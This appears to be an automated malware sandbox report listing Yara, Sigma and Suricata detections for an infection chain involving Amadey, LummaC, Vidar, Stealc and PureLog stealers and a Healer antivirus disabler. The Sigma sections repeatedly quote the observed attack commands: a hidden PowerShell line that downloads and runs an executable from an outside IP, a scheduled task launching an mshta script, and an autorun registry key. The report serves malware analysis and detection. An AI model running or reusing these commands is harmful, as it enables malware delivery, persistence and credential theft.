00000008.00000002.2000391945.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: random.exe PID: 7308	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: random.exe PID: 7308	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: random.exe PID: 7308	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 4CAJNBDWED5ZLJ2B.exe PID: 7676	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 4CAJNBDWED5ZLJ2B.exe PID: 7676	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 4CAJNBDWED5ZLJ2B.exe PID: 7676	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 4CAJNBDWED5ZLJ2B.exe PID: 7676	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: mshta.exe PID: 8008	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 8148	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 3844	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3852	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE PID: 7340	JoeSecurity_Healer	Yara detected Healer AV Disabler	Joe Security
Process Memory Space: TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE PID: 4408	JoeSecurity_Healer	Yara detected Healer AV Disabler	Joe Security
Process Memory Space: mshta.exe PID: 7632	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 1284	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 5272	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7864	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 1440	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6160	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 6800	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7080	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: Temp5RF1RNQ4BN1XE73CRLS7XGSUT9SU0VQR.EXE PID: 3756	JoeSecurity_Healer	Yara detected Healer AV Disabler	Joe Security
Process Memory Space: mshta.exe PID: 6220	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6292	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author
76.2.095fb861eb.exe.3c29550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
42.2.483d2fa8a0d53818306efeb32d3.exe.50000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.skotes.exe.1b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
76.2.095fb861eb.exe.3c29550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
76.0.095fb861eb.exe.630000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.da0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
8.2.skotes.exe.1b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 2 entries

Other

Source	Rule	Description	Author
amsi32_8148.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_3852.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_1284.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_7864.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_6160.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_7080.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_6292.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe, ParentProcessId: 7928, ParentProcessName: a59b997485.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 7944, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8076, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a59b997485.exe

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8008, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 8148, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe, ParentProcessId: 7928, ParentProcessName: a59b997485.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, ProcessId: 8008, ProcessName: mshta.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8008, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 8148, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe, ParentProcessId: 7928, ParentProcessName: a59b997485.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, ProcessId: 8008, ProcessName: mshta.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe", ParentImage: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe, ParentProcessId: 7676, ParentProcessName: 4CAJNBDWED5ZLJ2B.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 4008, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8076, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a59b997485.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8148, TargetFilename: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE

Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8008, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 8148, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1071539001\b33114b970.exe, ParentProcessId: 5500, ParentProcessName: b33114b970.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd, ProcessId: 560, ProcessName: cmd.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7944, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn 8unbAmadbNN /tr "mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 1928, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8008, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 8148, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8008, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 8148, ProcessName: powershell.exe

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3604, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 1804, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7196, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Powershell download and execute file

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8008, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;, ProcessId: 8148, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-08T20:21:15.439098+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	188.114.96.3	443	TCP
2025-02-08T20:21:16.453394+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	188.114.96.3	443	TCP
2025-02-08T20:21:18.017149+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	188.114.96.3	443	TCP
2025-02-08T20:21:19.355062+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	188.114.96.3	443	TCP
2025-02-08T20:21:20.837173+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	188.114.96.3	443	TCP
2025-02-08T20:21:22.762178+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	188.114.96.3	443	TCP
2025-02-08T20:21:24.236702+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	188.114.96.3	443	TCP
2025-02-08T20:21:28.619898+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	188.114.96.3	443	TCP
2025-02-08T20:22:45.256381+0100	2028371	3	Unknown Traffic	192.168.2.4	55428	104.21.38.167	443	TCP
2025-02-08T20:22:46.003328+0100	2028371	3	Unknown Traffic	192.168.2.4	55435	104.21.38.167	443	TCP
2025-02-08T20:22:47.758891+0100	2028371	3	Unknown Traffic	192.168.2.4	55450	104.21.38.167	443	TCP
2025-02-08T20:22:50.493830+0100	2028371	3	Unknown Traffic	192.168.2.4	55472	104.21.38.167	443	TCP
2025-02-08T20:22:51.852437+0100	2028371	3	Unknown Traffic	192.168.2.4	55479	104.21.38.167	443	TCP
2025-02-08T20:22:53.819061+0100	2028371	3	Unknown Traffic	192.168.2.4	55490	104.21.38.167	443	TCP
2025-02-08T20:22:59.589783+0100	2028371	3	Unknown Traffic	192.168.2.4	55522	104.21.38.167	443	TCP
2025-02-08T20:23:02.912347+0100	2028371	3	Unknown Traffic	192.168.2.4	55531	104.102.49.254	443	TCP
2025-02-08T20:23:05.092220+0100	2028371	3	Unknown Traffic	192.168.2.4	55534	104.21.38.167	443	TCP
2025-02-08T20:23:13.162090+0100	2028371	3	Unknown Traffic	192.168.2.4	63717	104.102.49.254	443	TCP
2025-02-08T20:23:14.954374+0100	2028371	3	Unknown Traffic	192.168.2.4	63718	188.114.96.3	443	TCP
2025-02-08T20:23:15.658160+0100	2028371	3	Unknown Traffic	192.168.2.4	63719	188.114.96.3	443	TCP
2025-02-08T20:23:18.785166+0100	2028371	3	Unknown Traffic	192.168.2.4	63725	188.114.96.3	443	TCP
2025-02-08T20:23:20.119535+0100	2028371	3	Unknown Traffic	192.168.2.4	63726	188.114.96.3	443	TCP
2025-02-08T20:23:21.132473+0100	2028371	3	Unknown Traffic	192.168.2.4	63728	172.67.150.254	443	TCP
2025-02-08T20:23:21.226616+0100	2028371	3	Unknown Traffic	192.168.2.4	63729	188.114.96.3	443	TCP
2025-02-08T20:23:21.788741+0100	2028371	3	Unknown Traffic	192.168.2.4	63730	172.67.150.254	443	TCP
2025-02-08T20:23:22.542320+0100	2028371	3	Unknown Traffic	192.168.2.4	63732	188.114.96.3	443	TCP
2025-02-08T20:23:23.217976+0100	2028371	3	Unknown Traffic	192.168.2.4	63734	172.67.150.254	443	TCP
2025-02-08T20:23:28.150082+0100	2028371	3	Unknown Traffic	192.168.2.4	63738	172.67.150.254	443	TCP
2025-02-08T20:23:28.952451+0100	2028371	3	Unknown Traffic	192.168.2.4	63740	188.114.96.3	443	TCP
2025-02-08T20:23:29.243981+0100	2028371	3	Unknown Traffic	192.168.2.4	63742	172.67.150.254	443	TCP
2025-02-08T20:23:30.786626+0100	2028371	3	Unknown Traffic	192.168.2.4	63743	172.67.150.254	443	TCP
2025-02-08T20:23:31.539021+0100	2028371	3	Unknown Traffic	192.168.2.4	63744	188.114.96.3	443	TCP
2025-02-08T20:23:32.585799+0100	2028371	3	Unknown Traffic	192.168.2.4	63746	172.67.150.254	443	TCP
2025-02-08T20:23:34.906466+0100	2028371	3	Unknown Traffic	192.168.2.4	63752	172.67.150.254	443	TCP
2025-02-08T20:23:44.261085+0100	2028371	3	Unknown Traffic	192.168.2.4	63761	172.67.150.254	443	TCP
2025-02-08T20:23:45.040287+0100	2028371	3	Unknown Traffic	192.168.2.4	63763	172.67.150.254	443	TCP
2025-02-08T20:23:46.475559+0100	2028371	3	Unknown Traffic	192.168.2.4	63766	172.67.150.254	443	TCP
2025-02-08T20:23:47.860710+0100	2028371	3	Unknown Traffic	192.168.2.4	63769	188.114.96.3	443	TCP
2025-02-08T20:23:48.779681+0100	2028371	3	Unknown Traffic	192.168.2.4	63776	172.67.150.254	443	TCP
2025-02-08T20:23:48.817730+0100	2028371	3	Unknown Traffic	192.168.2.4	63778	188.114.96.3	443	TCP
2025-02-08T20:23:50.045044+0100	2028371	3	Unknown Traffic	192.168.2.4	63781	172.67.150.254	443	TCP
2025-02-08T20:23:51.278523+0100	2028371	3	Unknown Traffic	192.168.2.4	63786	172.67.150.254	443	TCP
2025-02-08T20:23:51.455249+0100	2028371	3	Unknown Traffic	192.168.2.4	63787	188.114.96.3	443	TCP
2025-02-08T20:23:52.672294+0100	2028371	3	Unknown Traffic	192.168.2.4	63788	188.114.96.3	443	TCP
2025-02-08T20:23:52.985871+0100	2028371	3	Unknown Traffic	192.168.2.4	63790	172.67.150.254	443	TCP
2025-02-08T20:23:53.610335+0100	2028371	3	Unknown Traffic	192.168.2.4	63794	188.114.96.3	443	TCP
2025-02-08T20:23:53.764150+0100	2028371	3	Unknown Traffic	192.168.2.4	63796	188.114.96.3	443	TCP
2025-02-08T20:23:54.229495+0100	2028371	3	Unknown Traffic	192.168.2.4	63797	188.114.96.3	443	TCP
2025-02-08T20:23:55.249021+0100	2028371	3	Unknown Traffic	192.168.2.4	63802	188.114.96.3	443	TCP
2025-02-08T20:23:55.262260+0100	2028371	3	Unknown Traffic	192.168.2.4	63803	172.67.150.254	443	TCP
